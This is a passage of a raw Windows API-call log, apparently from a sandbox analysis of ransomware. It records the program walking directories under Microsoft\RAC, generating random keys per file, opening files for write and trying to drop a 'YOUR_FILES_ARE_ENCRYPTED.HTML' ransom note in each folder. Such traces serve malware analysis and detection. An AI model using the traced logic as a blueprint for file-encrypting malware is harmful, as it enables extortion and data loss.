hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbce2c00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.917] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.917] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Outbound\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\outbound\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.917] GetProcessHeap () returned 0x270000 [0169.918] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.918] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="PublishedData", cAlternateFileName="PUBLIS~1")) returned 1 [0169.918] GetProcessHeap () returned 0x270000 [0169.918] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.918] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData" [0169.918] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*" [0169.918] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.919] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbce2c00, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.919] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7fa373b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x9ada4280, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafec2e40, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x45000, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDatabase.sdf", cAlternateFileName="RACWMI~1.SDF")) returned 1 [0169.919] lstrcmpW (lpString1="RacWmiDatabase.sdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.919] PathFindExtensionW (pszPath="RacWmiDatabase.sdf") returned=".sdf" [0169.919] lstrlenW (lpString=".sdf") returned 4 [0169.919] PathFindExtensionW (pszPath="RacWmiDatabase.sdf") returned=".sdf" [0169.919] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.919] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\racwmidatabase.sdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.919] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbce2c00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe85b20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.919] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.919] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbce2c00, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbce2c00, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbe85b20, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.920] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.920] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\publisheddata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.920] GetProcessHeap () returned 0x270000 [0169.921] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.921] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="StateData", cAlternateFileName="STATED~1")) returned 1 [0169.921] GetProcessHeap () returned 0x270000 [0169.921] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.921] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData" [0169.921] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*" [0169.921] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.921] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f2fe55, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.921] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7f5747b0, ftCreationTime.dwHighDateTime=0x1d706a2, ftLastAccessTime.dwLowDateTime=0x7f5747b0, ftLastAccessTime.dwHighDateTime=0x1d706a2, ftLastWriteTime.dwLowDateTime=0xafee8fa0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x85000, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacDatabase.sdf", cAlternateFileName="RACDAT~1.SDF")) returned 1 [0169.921] lstrcmpW (lpString1="RacDatabase.sdf", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.921] PathFindExtensionW (pszPath="RacDatabase.sdf") returned=".sdf" [0169.921] lstrlenW (lpString=".sdf") returned 4 [0169.921] PathFindExtensionW (pszPath="RacDatabase.sdf") returned=".sdf" [0169.922] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacDatabase.sdf" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racdatabase.sdf"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.922] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e59a53, ftCreationTime.dwHighDateTime=0x1cb88f6, ftLastAccessTime.dwLowDateTime=0x3e59a53, ftLastAccessTime.dwHighDateTime=0x1cb88f6, ftLastWriteTime.dwLowDateTime=0xafee8fa0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x8, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacMetaData.dat", cAlternateFileName="RACMET~1.DAT")) returned 1 [0169.922] lstrcmpW (lpString1="RacMetaData.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.922] PathFindExtensionW (pszPath="RacMetaData.dat") returned=".dat" [0169.922] lstrlenW (lpString=".dat") returned 4 [0169.922] PathFindExtensionW (pszPath="RacMetaData.dat") returned=".dat" [0169.922] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.922] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacMetaData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racmetadata.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.922] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xcbeabc80, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478", cAlternateFileName="RACWMI~1.07A")) returned 1 [0169.922] lstrcmpW (lpString1="RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.922] PathFindExtensionW (pszPath="RacWmiDataBookmarks.dat.07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478") returned=".07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478" [0169.923] lstrlenW (lpString=".07A4111402B38CC80D9FC871E4AD8F0CAC9169A02228583F0BF4719D518B4478") returned 65 [0169.923] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xafe9cce0, ftCreationTime.dwHighDateTime=0x1d7e775, ftLastAccessTime.dwLowDateTime=0xafe9cce0, ftLastAccessTime.dwHighDateTime=0x1d7e775, ftLastWriteTime.dwLowDateTime=0xafe9cce0, ftLastWriteTime.dwHighDateTime=0x1d7e775, nFileSizeHigh=0x0, nFileSizeLow=0x401c, dwReserved0=0x0, dwReserved1=0x60, cFileName="RacWmiEventData.dat", cAlternateFileName="RACWMI~1.DAT")) returned 1 [0169.923] lstrcmpW (lpString1="RacWmiEventData.dat", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.923] PathFindExtensionW (pszPath="RacWmiEventData.dat") returned=".dat" [0169.923] lstrlenW (lpString=".dat") returned 4 [0169.923] PathFindExtensionW (pszPath="RacWmiEventData.dat") returned=".dat" [0169.923] SystemFunction036 (in: RandomBuffer=0x4ebd7ec, RandomBufferLength=0x20 | out: RandomBuffer=0x4ebd7ec) returned 1 [0169.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\RacWmiEventData.dat" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\racwmieventdata.dat"), dwDesiredAccess=0xc0010000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0xe0000000, hTemplateFile=0x0) returned 0xffffffff [0169.923] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.923] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.923] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.923] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.923] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\StateData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\statedata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.924] GetProcessHeap () returned 0x270000 [0169.925] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.925] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Temp", cAlternateFileName="")) returned 1 [0169.925] GetProcessHeap () returned 0x270000 [0169.925] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x73e0048 [0169.925] lstrcpyW (in: lpString1=0x73e0048, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp" [0169.925] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*" [0169.925] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\*", lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName=".", cAlternateFileName="")) returned 0x42f31c0 [0169.925] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xf9f55fb4, ftCreationTime.dwHighDateTime=0x1ca042b, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="..", cAlternateFileName="")) returned 1 [0169.925] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab6ad860, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab6ad860, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab6f9b20, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql5130.tmp", cAlternateFileName="")) returned 1 [0169.925] lstrcmpW (lpString1="sql5130.tmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.925] PathFindExtensionW (pszPath="sql5130.tmp") returned=".tmp" [0169.925] lstrlenW (lpString=".tmp") returned 4 [0169.925] PathFindExtensionW (pszPath="sql5130.tmp") returned=".tmp" [0169.925] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xab76bf40, ftCreationTime.dwHighDateTime=0x1d7e790, ftLastAccessTime.dwLowDateTime=0xab76bf40, ftLastAccessTime.dwHighDateTime=0x1d7e790, ftLastWriteTime.dwLowDateTime=0xab76bf40, ftLastWriteTime.dwHighDateTime=0x1d7e790, nFileSizeHigh=0x0, nFileSizeLow=0x5000, dwReserved0=0x0, dwReserved1=0x60, cFileName="sql517F.tmp", cAlternateFileName="")) returned 1 [0169.925] lstrcmpW (lpString1="sql517F.tmp", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0169.926] PathFindExtensionW (pszPath="sql517F.tmp") returned=".tmp" [0169.926] lstrlenW (lpString=".tmp") returned 4 [0169.926] PathFindExtensionW (pszPath="sql517F.tmp") returned=".tmp" [0169.926] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.926] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.926] FindNextFileW (in: hFindFile=0x42f31c0, lpFindFileData=0x4ebd848 | out: lpFindFileData=0x4ebd848*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbed1de0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.926] FindClose (in: hFindFile=0x42f31c0 | out: hFindFile=0x42f31c0) returned 1 [0169.926] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.926] GetProcessHeap () returned 0x270000 [0169.927] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x73e0048 | out: hHeap=0x270000) returned 1 [0169.927] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 1 [0169.927] lstrcmpW (lpString1="YOUR_FILES_ARE_ENCRYPTED.HTML", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0 [0169.955] FindNextFileW (in: hFindFile=0x42f3180, lpFindFileData=0x4ebdb54 | out: lpFindFileData=0x4ebdb54*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xcbed1de0, ftCreationTime.dwHighDateTime=0x1d7fb46, ftLastAccessTime.dwLowDateTime=0xcbed1de0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbef7f40, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x3c00, dwReserved0=0x0, dwReserved1=0x60, cFileName="YOUR_FILES_ARE_ENCRYPTED.HTML", cAlternateFileName="YOUR_F~1.HTM")) returned 0 [0169.955] FindClose (in: hFindFile=0x42f3180 | out: hFindFile=0x42f3180) returned 1 [0169.955] CreateFileW (lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\RAC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\all users\\microsoft\\rac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0169.955] GetProcessHeap () returned 0x270000 [0169.956] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74fa168 | out: hHeap=0x270000) returned 1 [0169.956] FindNextFileW (in: hFindFile=0x42f3140, lpFindFileData=0x4ebde60 | out: lpFindFileData=0x4ebde60*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xd0e963b0, ftCreationTime.dwHighDateTime=0x1d70517, ftLastAccessTime.dwLowDateTime=0xcbf1e0a0, ftLastAccessTime.dwHighDateTime=0x1d7fb46, ftLastWriteTime.dwLowDateTime=0xcbf1e0a0, ftLastWriteTime.dwHighDateTime=0x1d7fb46, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="Search", cAlternateFileName="")) returned 1 [0169.956] GetProcessHeap () returned 0x270000 [0169.956] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74fa168 [0169.956] lstrcpyW (in: lpString1=0x74fa168, lpString2="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search" [0169.956] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*") returned="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*" [0169.956] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\All Users\\Microsoft\\Search\\*", lpFindFileData=0x4ebdb54 | out: 